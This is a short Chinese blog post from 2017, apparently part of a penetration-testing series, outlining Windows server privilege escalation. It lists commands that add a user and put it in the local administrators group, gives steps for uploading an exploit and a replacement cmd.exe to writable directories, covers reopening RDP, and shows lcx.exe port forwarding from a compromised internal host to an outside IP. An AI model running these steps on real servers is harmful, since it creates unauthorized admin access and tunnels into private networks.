【渗透测试】-服务器提权之初入茅庐
2017-08-11 本文已影响105人
lndyzwdxhs
0x01:什么情况下会用到提权?
- 旁注
- 对同服务器下的不同站点进行渗透,达到对目标站点的渗透
- C段
- 对同网段下的不同服务器进行渗透,达到对目标服务器的目标站点的渗透
0x02:提权常用命令
- Windows:
- Whoami 查看当前操作用户
- Ipconfig ip地址获取命令
- Net user用户操作命令
- Net user cs 123456 /add 添加用户名cs,密码123456的用户
- Net user cs /del 删除用户cs
- Net localgroup administrators cs /add 将用户cs添加到本地管理员组
- Tasklist /svc 进程获取命令
- Netstat -ano 网络端口命令
- Systeminfo 计算机信息获取命令
- Linux:
- 待续...
0x03:提权技术分类
- 溢出漏洞提权
- 提权准备,信息收集(操作系统版本、位数、补丁情况、有无防护软件)
- 对比补丁及操作系统信息,筛选出exp(可以使用提权exp工具)
- 执行exp进行提权
- 寻找可读可写目录(目录探测工具或者webshell自带),上传exp
- 执行exp,添加用户并设置为管理员权限,远程连接
- 数据库提权
- 第三方软件提权
0x04:提权遇到的问题?
-
cmd无法执行
-
cmd被删除
- 绕过思路:找可读可写目录,上传cmd.exe
-
cmd被降权
- 绕过思路:找可读可写目录,上传cmd.exe
-
组件被删除
- 切换组件
-
防护软件拦截
- 很难绕过
-
-
3389无法连接
- 端口被修改
- 找端口(1-65535),使用端口扫描工具、注册表读取、查询PID
- 端口被关闭
- 上传3389打开工具到可读可写目录,需要先提权,调用执行exe工具
- 内网环境
- 端口转发:
- 外网服务器:lcx.exe -listen 1234 4321 (监听1234端口的流量并将其转发至本地4321端口)
- 内网肉鸡:lcx.exe -slave 121.43.99.73 1234 192.168.1.106 1111 (将本地192.168.1.106的1111端口流量转发至121.43.99.73的1234端口上)
- 外网 连接本地端口4321 即代表连接肉鸡的1111端口
- 端口转发:
- 防护软件拦截
- 很困难
- 端口被修改
欢迎关注微信公众号(coder0x00)或扫描下方二维码关注,我们将持续搜寻程序员必备基础技能包提供给大家。